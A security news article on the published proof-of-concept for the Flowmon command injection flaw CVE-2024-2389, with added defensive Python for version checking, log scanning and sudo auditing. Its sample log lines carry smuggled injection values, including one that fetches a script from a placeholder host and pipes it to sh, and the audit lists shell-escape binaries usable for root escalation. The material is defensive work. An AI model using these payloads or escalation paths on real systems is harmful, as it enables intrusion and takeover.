PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389)
More details of, and a proof-of-concept (PoC) exploit for, an unauthenticated OS command injection vulnerability in Flowmon, Progress Software's network monitoring, analysis and security solution, have been published.
The critical vulnerability was disclosed and patched by Progress earlier this month.
CVE-2024-2389 is a command injection vulnerability affecting Flowmon versions 11.x and 12.x (fixed in 11.1.14 and 12.3.5); versions 10.x and lower are not affected.
"Unauthenticated, remote attackers can gain access to the web interface of Flowmon to issue a carefully crafted API command that will allow arbitrary system commands to be executed without authentication," the company explained.
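The two things a defender wants from the description above are a quick way to decide whether a given Flowmon build is in the affected range, and a way to spot injection attempts against the web interface in existing access logs. The following is an added example, not code from the article, Rhino Security Labs or Progress. It assumes the fixed builds Progress shipped for this CVE (11.1.14 and 12.3.5); the log lines are constructed, and the `/api/example` path is a placeholder rather than a Flowmon endpoint, because the article does not name the vulnerable API.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Affected branches as stated by Progress: 11.x and 12.x. The fixed builds (11.1.14 and
# 12.3.5) are the ones Progress shipped for this CVE; check them against your advisory copy.
FIXED_BUILD = {11: (11, 1, 14), 12: (12, 3, 5)}


def parse_version(version: str) -> tuple:
    """'12.3.4' -> (12, 3, 4); tolerates a trailing build suffix such as '12.3.4-1'."""
    return tuple(int(p) for p in version.strip().split("-")[0].split("."))


def is_vulnerable(version: str) -> bool:
    """True when the version is in an affected branch and older than its fixed build."""
    parts = parse_version(version)
    fixed = FIXED_BUILD.get(parts[0])
    if fixed is None:
        return False  # 10.x and lower are not affected; other majors are not claimed
    return parts < fixed


# Shell metacharacters an OS command injection payload normally needs.
SHELL_META = re.compile(r"[;|&`]|\$\(|\$\{")

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def suspicious_requests(lines):
    """Flag query parameters whose decoded value contains shell metacharacters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            decoded = unquote(value)  # parse_qsl decoded once; this pass catches double encoding
            if SHELL_META.search(decoded):
                hits.append({
                    "ip": m.group("ip"),
                    "path": url.path,
                    "param": key,
                    "value": decoded,
                    "status": m.group("status"),
                })
    return hits


# Constructed sample lines; /api/example is a placeholder path, not a Flowmon endpoint.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Apr/2024:10:14:02 +0000] "GET /api/example?name=weekly HTTP/1.1" 200 512',
    '203.0.113.7 - - [23/Apr/2024:10:14:05 +0000] "GET /api/example?name=%24%28id%29 HTTP/1.1" 200 512',
    '198.51.100.9 - - [23/Apr/2024:10:15:11 +0000] "GET /api/example?name=a%3Bcurl+198.51.100.9%2Fx%7Csh HTTP/1.1" 200 17',
    '198.51.100.9 - - [23/Apr/2024:10:15:40 +0000] "GET /api/example?name=%2524%2528id%2529 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for v in ("10.9.1", "11.1.13", "12.3.4", "12.3.5"):
        print(v, "vulnerable" if is_vulnerable(v) else "not affected / fixed")
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Access logs only carry the query string, so a payload sent in a POST body is invisible to this scan; for that you need the reverse proxy or WAF to log request bodies, or to look at the process tree on the appliance itself (a shell spawned by the web server's user is the stronger signal).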
The vulnerability was discovered and reported to Progress by David Yesland, a penetration tester at Rhino Security Labs, who detailed the discovery in a blog post published on Tuesday.
He noted that once the vulnerability is exploited and command execution is achieved, "The application runs as the 'flowmon' user so command will be executed as this user. The flowmon user can run several commands with sudo and several of the commands can be abused to obtain a root shell."
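The privilege escalation step described above depends entirely on what the service account may run with sudo, so the useful check on a patched or unpatched appliance is an audit of `sudo -l` for the `flowmon` user. The following is an added example, not code from the article or from Progress: it parses `sudo -l` output and flags rules that use shell-capable binaries, wildcards, or `ALL`. The sudoers rules in `SAMPLE_SUDO_L` are constructed for illustration; the article does not name the commands the flowmon user can actually run, and the `SHELL_ESCAPES` set is an assumed subset of the well-known GTFOBins catalogue.

```python
import re

# Binaries that can hand the caller a shell or an arbitrary file write when run via sudo
# (an assumed subset of the GTFOBins catalogue, for illustration only).
SHELL_ESCAPES = {
    "bash", "sh", "env", "vim", "vi", "less", "more", "find", "awk",
    "perl", "python", "python3", "tar", "tee", "cp", "mv", "dd",
}

# One rule line of `sudo -l` output: "(runas) TAG: TAG: command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text):
    """Return the rule lines from `sudo -l` output as dicts (runas, tags, cmd)."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m.group("runas"),
                "tags": [t.rstrip(":") for t in m.group("tags").split()],
                "cmd": m.group("cmd").strip(),
            })
    return rules


def assess(rule):
    """List the reasons a rule could be abused to escalate beyond its intended purpose."""
    cmd = rule["cmd"]
    if cmd == "ALL":
        return [f"unrestricted: any command as {rule['runas']}"]
    reasons = []
    binary = cmd.split()[0].rsplit("/", 1)[-1]
    if binary in SHELL_ESCAPES:
        reasons.append(f"{binary} can spawn a shell or write files as {rule['runas']}")
    if "*" in cmd:
        reasons.append("wildcard lets the caller supply extra arguments or options")
    if "NOPASSWD" in rule["tags"] and reasons:
        reasons.append("no password prompt, so usable straight from a web RCE")
    return reasons


def audit(text):
    """Return (rule, reasons) for every rule with at least one finding."""
    flagged = []
    for rule in parse_sudo_l(text):
        reasons = assess(rule)
        if reasons:
            flagged.append((rule, reasons))
    return flagged


# Constructed `sudo -l` output for illustration; not the real Flowmon sudoers.
SAMPLE_SUDO_L = """\
Matching Defaults entries for flowmon on collector:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

User flowmon may run the following commands on collector:
    (root) NOPASSWD: /usr/bin/systemctl restart example-collector
    (root) NOPASSWD: /usr/bin/tar *
    (root) NOPASSWD: /usr/bin/find /var/log/example -name *.log
    (root) /usr/bin/less /var/log/example/*
"""

if __name__ == "__main__":
    for rule, reasons in audit(SAMPLE_SUDO_L):
        print(rule["cmd"])
        for reason in reasons:
            print("   -", reason)
```

Run it against `sudo -l -U flowmon` output captured from the appliance; anything it flags is a candidate for replacement with a fixed-argument wrapper script, since even a correctly patched web application is only one bug away from handing an attacker that sudo rule again.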
Source: https://www.helpnetsecurity.com/2024/04/24/poc-cve-2024-2389/